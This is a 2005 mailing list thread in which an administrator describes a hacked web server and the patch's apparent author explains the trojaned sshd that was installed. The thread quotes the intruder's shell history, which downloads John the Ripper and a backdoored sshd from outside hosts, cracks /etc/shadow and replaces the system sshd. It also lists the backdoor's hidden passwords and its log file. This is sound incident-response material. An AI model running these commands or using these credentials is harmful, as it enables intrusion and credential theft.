Security Incidents mailing list archives
Re: SSH compiled with backdoor
From: "VeNoMouS" <venom () gen-x co nz>
Date: Tue, 30 Aug 2005 15:17:48 +1200
Hi Steve, i actually wrote that patch back in like shit 2001 or something it logs all ssh connection logins in plain to a txt file, it also puts a backdoor passwd into the ssh and wont show up in wtmp, making the user (what ever he logs in as ) invisible, so say u login with the username root and your use the global hidden passwd it will allow him on as root. looking at the code he users the following passwds for this global passwd. "toji" and "fv11r01rc3@l" the file that logs all the logins with time stamps and src ips is "dev/saux" Hope this helps you , if you require any further information email me back, been a few years since I even looked at this code. ---------- Forwarded message ---------- From: steve () example org <steve () example org> Date: 27 Aug 2005 13:02:08 -0000 Subject: SSH compiled with backdoor To: incidents () securityfocus com Hi! One of my web servers was hacked on July 17, 2005. bash_history showed: w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh pico genx.h pico genx.h pico ssh2includes.h cd ../.. ./configure --without-x make make install mkdir /lib/java cp /usr/sbin/sshd a mv a /lib/java rm -rf /usr/sbin/sshd cp /usr/local/sbin/sshd /usr/sbin /etc/rc.d/init.d/sshd restart /etc/rc.d/init.d/ssh restart locate init.d /etc/init.d/sshd restart w reboot According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there. I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault. A ps x showed mech.tgz trying to be downloaded, and a bunch of other CRON processes running. The auth log didn't show other logins, though, so the ssh installed must have logging turned off for the backdoor they installed. I filled out an abuse form at geocities for the accounts hosting the software after downloading the software (I couldn't find the tgz files on my system). Last showed: reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15 (37+11:47) website pts/0 193.231.77.74 Sun Jul 17 17:42 - down (00:27) website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26 (00:20) website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41 (01:14) whois says: inetnum: 193.231.77.0 - 193.231.77.255 netname: DATANET-RO descr: Starnets - Datanet country: RO address: DATA NET address: Str. Ioan N. Roman Nr. 13 address: Constanta, cod 900199, ROMANIA Best Regards, Steve
Current thread:
- SSH compiled with backdoor steve (Aug 29)
- Re: SSH compiled with backdoor Francesca Smith (Aug 29)
- Re: SSH compiled with backdoor Javier Fernandez-Sanguino (Aug 30)
- Message not available
- Re: SSH compiled with backdoor VeNoMouS (Aug 30)